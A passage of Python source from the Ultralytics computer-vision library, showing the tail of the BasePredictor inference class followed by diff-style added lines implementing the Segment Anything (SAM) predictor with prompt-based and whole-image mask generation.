            (list): A list of transformed images.
        """
        same_shapes = len({x.shape for x in im}) == 1
        letterbox = LetterBox(
            self.imgsz,
            # `auto` is enabled only when every image has the same shape and the model is a PyTorch
            # model or reports `dynamic`
            auto=same_shapes and (self.model.pt or getattr(self.model, "dynamic", False)),
            stride=self.model.stride,
        )
        return [letterbox(image=x) for x in im]

    def postprocess(self, preds, img, orig_imgs):
        """Post-processes predictions for an image and returns them (identity in the base class)."""
        return preds

    def __call__(self, source=None, model=None, stream=False, *args, **kwargs):
        """
        Performs inference on an image or stream.

        Returns:
            A generator of results when `stream` is truthy, otherwise a list with all results.
        """
        self.stream = stream
        if stream:
            return self.stream_inference(source, model, *args, **kwargs)
        else:
            return list(self.stream_inference(source, model, *args, **kwargs))  # merge list of Result into one

    def predict_cli(self, source=None, model=None):
        """
        Method used for Command Line Interface (CLI) prediction.

        This function is designed to run predictions using the CLI. It sets up the source and model, then processes
        the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the
        generator without storing results.

        Note:
            Do not modify this function or remove the generator. The generator ensures that no outputs are
            accumulated in memory, which is critical for preventing memory issues during long-running predictions.
        """
        gen = self.stream_inference(source, model)
        for _ in gen:  # sourcery skip: remove-empty-nested-block, noqa
            pass

    def setup_source(self, source):
        """
        Sets up source and inference mode.

        Validates the image size, selects classification transforms (classify task only), builds the dataset,
        and logs STREAM_WARNING when results would accumulate in memory for a long-running source.
        """
        self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2)  # check image size
        self.transforms = (
            getattr(
                self.model.model,
                "transforms",
                classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction),
            )
            if self.args.task == "classify"
            else None
        )
        self.dataset = load_inference_source(
            source=source,
            batch=self.args.batch,
            vid_stride=self.args.vid_stride,
            buffer=self.args.stream_buffer,
        )
        self.source_type = self.dataset.source_type
        # `stream` is only set by __call__; when it is missing the warning is suppressed
        if not getattr(self, "stream", True) and (
            self.source_type.stream
            or self.source_type.screenshot
            or len(self.dataset) > 1000  # many images
            or any(getattr(self.dataset, "video_flag", [False]))
        ):  # videos
            LOGGER.warning(STREAM_WARNING)
        self.vid_writer = {}

    @smart_inference_mode()
    def stream_inference(self, source=None, model=None, *args, **kwargs):
        """
        Streams inference over a source, yielding results batch by batch.

        Sets up the model (once) and the source (every call), warms the model up, then for each batch runs
        preprocess, inference and postprocess under per-stage profilers. When `args.embed` is set the raw
        embeddings are yielded instead and post-processing is skipped. Video writers are released and summary
        lines are logged after the source is exhausted.

        Args:
            source: Inference source; falls back to `args.source` when None.
            model: Model or weights forwarded to `setup_model` if no model is loaded yet.
            *args: Extra positional arguments forwarded to `inference`.
            **kwargs: Extra keyword arguments forwarded to `inference`.

        Yields:
            One result per image, or embedding tensors when `args.embed` is set.
        """
        if self.args.verbose:
            LOGGER.info("")

        # Setup model
        if not self.model:
            self.setup_model(model)

        with self._lock:  # for thread-safe inference
            # Setup source every time predict is called
            self.setup_source(source if source is not None else self.args.source)

            # Check if save_dir/ label file exists
            if self.args.save or self.args.save_txt:
                (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True)

            # Warmup model
            if not self.done_warmup:
                self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz))
                self.done_warmup = True

            self.seen, self.windows, self.batch = 0, [], None
            profilers = (
                ops.Profile(device=self.device),
                ops.Profile(device=self.device),
                ops.Profile(device=self.device),
            )
            self.run_callbacks("on_predict_start")
            for self.batch in self.dataset:
                self.run_callbacks("on_predict_batch_start")
                paths, im0s, s = self.batch

                # Preprocess
                with profilers[0]:
                    im = self.preprocess(im0s)

                # Inference
                with profilers[1]:
                    preds = self.inference(im, *args, **kwargs)
                    if self.args.embed:
                        yield from [preds] if isinstance(preds, torch.Tensor) else preds  # yield embedding tensors
                        continue

                # Postprocess
                with profilers[2]:
                    self.results = self.postprocess(preds, im, im0s)
                self.run_callbacks("on_predict_postprocess_end")

                # Visualize, save, write results
                n = len(im0s)
                for i in range(n):
                    self.seen += 1
                    # Batch-level timings are split evenly across the images of the batch
                    self.results[i].speed = {
                        "preprocess": profilers[0].dt * 1e3 / n,
                        "inference": profilers[1].dt * 1e3 / n,
                        "postprocess": profilers[2].dt * 1e3 / n,
                    }
                    if self.args.verbose or self.args.save or self.args.save_txt or self.args.show:
                        s[i] += self.write_results(i, Path(paths[i]), im, s)

                # Print batch results
                if self.args.verbose:
                    LOGGER.info("\n".join(s))

                self.run_callbacks("on_predict_batch_end")
                yield from self.results

        # Release assets
        for v in self.vid_writer.values():
            if isinstance(v, cv2.VideoWriter):
                v.release()

        # Print final results
        if self.args.verbose and self.seen:
            t = tuple(x.t / self.seen * 1e3 for x in profilers)  # speeds per image
            LOGGER.info(
                f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape "
                f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t
            )
        if self.args.save or self.args.save_txt or self.args.save_crop:
            nl = len(list(self.save_dir.glob("labels/*.txt")))  # number of labels
            s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else ""
            LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}")
        self.run_callbacks("on_predict_end")

    def setup_model(self, model, verbose=True):
        """
        Initialize YOLO model with given parameters and set it to evaluation mode.

        Args:
            model: Weights or model passed to AutoBackend; `args.model` is used when this is falsy.
            verbose (bool): Forwarded to device selection and AutoBackend.
        """
        self.model = AutoBackend(
            weights=model or self.args.model,
            device=select_device(self.args.device, verbose=verbose),
            dnn=self.args.dnn,
            data=self.args.data,
            fp16=self.args.half,
            batch=self.args.batch,
            fuse=True,
            verbose=verbose,
        )

        self.device = self.model.device  # update device
        self.args.half = self.model.fp16  # update half
        self.model.eval()

    def write_results(self, i, p, im, s):
        """
        Builds the log string for one result and optionally plots, shows and saves it.

        Args:
            i (int): Index of the image within the current batch.
            p (Path): Source path of the image.
            im (torch.Tensor): Preprocessed batch (a 3-dim tensor is expanded with a batch dimension).
            s (List[str]): Per-image log prefixes of the batch; used to recover the frame number.

        Returns:
            (str): Log string with the image shape, the result summary and the inference time.
        """
        string = ""  # print string
        if len(im.shape) == 3:
            im = im[None]  # expand for batch dim
        if self.source_type.stream or self.source_type.from_img or self.source_type.tensor:  # batch_size >= 1
            string += f"{i}: "
            frame = self.dataset.count
        else:
            match = re.search(r"frame (\d+)/", s[i])
            frame = int(match[1]) if match else None  # None if frame undetermined

        self.txt_path = self.save_dir / "labels" / (p.stem + ("" if self.dataset.mode == "image" else f"_{frame}"))
        string += "{:g}x{:g} ".format(*im.shape[2:])
        result = self.results[i]
        result.save_dir = str(self.save_dir)  # used in other locations
        string += f"{result.verbose()}{result.speed['inference']:.1f}ms"

        # Add predictions to image
        if self.args.save or self.args.show:
            self.plotted_img = result.plot(
                line_width=self.args.line_width,
                boxes=self.args.show_boxes,
                conf=self.args.show_conf,
                labels=self.args.show_labels,
                im_gpu=None if self.args.retina_masks else im[i],
            )

        # Save results
        if self.args.save_txt:
            result.save_txt(f"{self.txt_path}.txt", save_conf=self.args.save_conf)
        if self.args.save_crop:
            result.save_crop(save_dir=self.save_dir / "crops", file_name=self.txt_path.stem)
        if self.args.show:
            self.show(str(p))
        if self.args.save:
            self.save_predicted_images(str(self.save_dir / p.name), frame)

        return string

    def save_predicted_images(self, save_path="", frame=0):
        """
        Saves the last plotted image as a video frame or as a JPG image.

        For 'stream' and 'video' datasets the frame is appended to a video writer keyed by `save_path` (created
        on first use with a platform-dependent container and codec) and, when `args.save_frames` is set, also
        written as '<save_path without suffix>_frames/<frame>.jpg'. For any other dataset mode the image is
        written next to `save_path` with a '.jpg' suffix.

        Args:
            save_path (str): Destination path; its suffix is replaced as described above.
            frame (int | None): Frame number used to name individually saved frames.
        """
        im = self.plotted_img

        # Save videos and streams
        if self.dataset.mode in {"stream", "video"}:
            fps = self.dataset.fps if self.dataset.mode == "video" else 30
            # Strip only the file's final suffix. Splitting the whole path on its first "." would truncate
            # at dots in directory names (e.g. 'runs/v1.2/clip.mp4') or at a leading './'.
            frames_dir = Path(f"{Path(save_path).with_suffix('')}_frames")
            if save_path not in self.vid_writer:  # new video
                if self.args.save_frames:
                    frames_dir.mkdir(parents=True, exist_ok=True)
                suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG")
                self.vid_writer[save_path] = cv2.VideoWriter(
                    filename=str(Path(save_path).with_suffix(suffix)),
                    fourcc=cv2.VideoWriter_fourcc(*fourcc),
                    fps=fps,  # integer required, floats produce error in MP4 codec
                    frameSize=(im.shape[1], im.shape[0]),  # (width, height)
                )

            # Save video
            self.vid_writer[save_path].write(im)
            if self.args.save_frames:
                cv2.imwrite(str(frames_dir / f"{frame}.jpg"), im)

        # Save images
        else:
            cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im)  # save to JPG for best support

    def show(self, p=""):
        """
        Display an image in a window using the OpenCV imshow function.

        Args:
            p (str): Window name; on Linux a resizable window is created the first time a name is seen.
        """
        im = self.plotted_img
        if platform.system() == "Linux" and p not in self.windows:
            self.windows.append(p)
            cv2.namedWindow(p, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)  # allow window resize (Linux)
            cv2.resizeWindow(p, im.shape[1], im.shape[0])  # (width, height)
        cv2.imshow(p, im)
        cv2.waitKey(300 if self.dataset.mode == "image" else 1)  # 300 ms for still images, otherwise 1 ms

    def run_callbacks(self, event: str):
        """Runs all registered callbacks for a specific event, passing this predictor to each."""
        for callback in self.callbacks.get(event, []):
            callback(self)

    def add_callback(self, event: str, func):
        """Appends `func` to the callbacks registered for `event`."""
        self.callbacks[event].append(func)
+ +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. 
+ std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. 
+ + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. 
+ + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. 
+ (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. 
+ + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. 
+ crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). 
+ + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. 
+ pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. 
+ + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" 
+ for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. 
